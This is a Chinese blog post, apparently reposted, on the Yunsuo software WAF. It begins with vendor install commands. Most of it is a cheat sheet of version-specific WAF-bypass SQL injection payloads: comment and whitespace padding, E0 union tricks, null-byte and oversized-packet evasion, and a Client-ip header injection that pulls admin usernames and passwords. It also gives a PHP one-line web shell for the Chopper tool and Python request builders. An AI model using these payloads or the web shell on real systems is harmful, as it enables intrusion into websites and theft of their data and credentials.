应用安全-安全设备-Waf系列-软Waf-云锁
安装
安装 - Linux
前提:检查selinux状态 - 关闭selinux getenforce #显示为disabled则为关闭1.下载 x86:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_32bit.tar.gz && tar xvzf yunsuo_agent_32bit.tar.gz && chmod +x yunsuo_install/install && yunsuo_install/install x64:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_64bit.tar.gz && tar xvzf yunsuo_agent_64bit.tar.gz && chmod +x yunsuo_install/install && 2.解压 chmod +x yunsuo_install/install3.在当前路径下执行安装 yunsuo_install/install 4.添加服务器到云中心。/usr/local/yunsuo_agent/yunsuo_smart_tool.sh -u cloud_name -p cloud_passwd 注:cloud_name:云中心账户名;cloud_passwd:云中心登录密码5.查看状态ps -ef | grep yunsuo_agent相关命令 云锁启动/停止/重启/运行状态 service yunsuo start/stop/restart/status /etc/init.d/yunsuo start/stop/restart/status卸载 /usr/local/yunsuo_agent/uninstall
安装 - Windos
下载http://download.yunsuo.com.cn/v3/%E4%BA%91%E9%94%81%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF(%E5%AE%89%E8%A3%85%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A).exe
免杀
GET POST转换 + 空格替换
针对过滤不完全情况 搜索框 + SQL注入 + 字符型
?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23 ?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23
union select + ()绕过
?id=-1union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17)
union select + '' + /**/ + ) + # 绕过
?id='/*')union select user,database() from users%23*/&submit=Submit#
IIS + 字符编码绕过 - unicode
asp?t=112 %u00aand(s%u00f0lect top 1 eventname_en from eventshelp) > 0 WideChar和MultiByte字符转换问题 - 2002年
一句话 + 菜刀 绕过
<?php<br> $_REQUEST['a']($_REQUEST['b']);<br> ?>
1.3.145版本 - 包冗余绕过
超过7250byte的部分不被检测
1.3.145版本 - \x00 绕过
GET型 def getdata(n):data = 'name=\x00test'data += '&id=select 1 from table'return dataPOST型 def postdata(n)data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'data += '------'WebKitFormBoundarycMYRelX1B2H69xy9\r\n' data += '%27abcd\r\n'data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'data += 'Content-Disposition: form-data; name="submit"\r\n\r\n'data += 'select 1 from table\r\n'data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'return dataCOOKIE型 header = {'User-Agent' : 'letmetest','Content-Type' : 'multipart/form-data: boundary=----WebKitFormBoundarycMYRelX1B2H69xy9''X-forwarded-For' : 'select 1 from table' }
1.3.145版本 - E0绕过
?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#
1.3.191版本 - E0 + /**/ + current_user 绕过
?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43# ?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
1.4.121版本 - 默认对post、cookie不检测,对header字段未做防护
Header头 - Client-ip注入 Client-ip: 1.2.3.4 'or @ `'` AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)), (SELECT concat(username,0x23,password) FROM pm_admin LIMIT 0,1)) a FROM information_schema.tables GROUP by a)b) or @ `'` and ''='
转载于:https://www.cnblogs.com/AtesetEnginner/p/11358064.html
应用安全-安全设备-Waf系列-软Waf-云锁相关推荐
- 全方位绕过软WAF攻略
0×00 前言 现在软waf较为多,就在今年夏天苦逼挖洞的日子里经常遇到360主机卫士,安全狗,云锁之类的软waf进行拦截,经常碰到如下拦截提示: 看到以上三个拦截提示就让人头疼不已,欲罢不能. so ...
- 考试备战系列--软考--02基础知识复习
这部分主要是计算机基础知识的概念介绍,相关系列文章如下所示. 考试备战系列--软考--01基础架构概念 考试备战系列--软考--02基础知识复习 考试备战系列--软考--03综合知识复习 考试备战系列 ...
- 启动设备ar1失败 错误代码2_设备启动系列(2)寿力空压机
设备启动系列(2) 寿力空压机 寿力空压机启动检查及注意事项 寿力空压机启动前检查 1.仔细检查机组各部位有无异常 ---检查空滤有无破损. ---手动盘动机头是否灵活. ---油滤.油分罐.各油路管 ...
- WAF自动化Fuzz工具-WAFNinja(绕WAF、绕过WAF)
目录 前言 简介 下载安装 下载方式: 安装 使用 查看帮助信息 使用示例 参数介绍 前言 在我们平时做渗透测试的时候,难免会遇到各种WAF的阻挡.这时一款良好的绕过WAF的渗透测试工具就显得很受渗透 ...
- 过云锁php木马,绕过waf的另类木马文件攻击方法
很久没写文章了,继上次发先文章到今天已经很久了:很久没写文章了,继上次发先文章到今天已经很久了:今天突发异想:因为之前打了西湖论剑,遇到了宝塔的waf,最后也是过去了,便觉得另类的攻击方法值得写篇文章 ...
- 过云锁php大马,华夏名网某分站弱口令可Getshell(过云锁waf案例)
直接进入正题吧,这次的站点是http://bbs.sudu.cn/弱口令:用户名admin 密码qwer 进后台看了一下,是Discuz! X3.2 Release 20140603版本,从前台少的可 ...
- 设备指纹系列--前端篇
基础篇请看:设备指纹系列–基础篇 我们接着前文继续写关于设备指纹前端接入方面的内容.话不多说,直接步入正题. 我们会在下文展示5种前端接入的方式,包括web接入.安卓接入.ios接入.微信小程序接入以 ...
- (18)【WAF绕过】WAF部署、绕过分析和原理、注入绕过WAF方法
目录 一.WAF部署: 1.1.阿里云盾 1.2.安全狗: 1.3.宝塔面板: 下载地址: 桌面应用端 web网页端 二.WAF绕过 2.1.原理: 2.2.介绍: 2.3.WAF分为非嵌入型WAF和 ...
- 涡轮发动机图测试线2010开关测试机SW辊子输送机用抓手SW双头精雕机IGSFPC折弯设备、FPC软板折弯机SWZ4直流电机_三维图Z4-112-4-1_5.5KW_160-1抛光机三维图
涡轮发动机图 测试线2010开关测试机SW 辊子输送机用抓手SW 双头精雕机IGS FPC折弯设备.FPC软板折弯机SW Z4直流电机_三维图Z4-112-4-1_5.5KW_160-1 抛光机三维图 ...
- 软考刷题利器—软考云题库Web版
之前有朋友说小程序刷题有时不太方便,想在电脑上刷题,能不能开发个Web版,后来就有了软考云题库的Web版. 项目采用了SpringBoot 2.0+JPA+Thymeleaf 模板+Bootstrap ...
最新文章
- linux用户态驱动--VIFIO、IOMMU、UIO(二)
- DB Query Analyzer 中断SQL语句的执行
- Asp.net MVC 仿照博客园的简单网站首页 列表设计
- MYSQL复制的几种模式
- xshell常用的命令
- WinCE流设备驱动简介及GPIO驱动的实现
- 从零开始学架构5 - 实战篇
- python html5交互方式,python+Django(5)—回传至前端几种方式
- html得到上传文件类型后缀,js获取上传文件后缀名(附js提交form表单)
- JSP转译成Servlet详细过程
- ngrok实现内网穿透
- java 主流算法_java常用算法
- 初读《Linux运维之道》浅见
- FlashXP加密方式的一种破解方法
- 「BJOI 2019」排兵布阵
- 三星基于新思科技良率学习平台加速7纳米技术节点的新品量产
- 一款APP,秒杀50+视频平台VIP!
- 服务器主板安装win10系统,装win10主板怎么设置_装win10主板设置教程 - 系统家园...
- 中国煤矿机械行业市场动态调研及未来发展方向分析报告2022-2028年
- kafka教程之linux安装教程(一)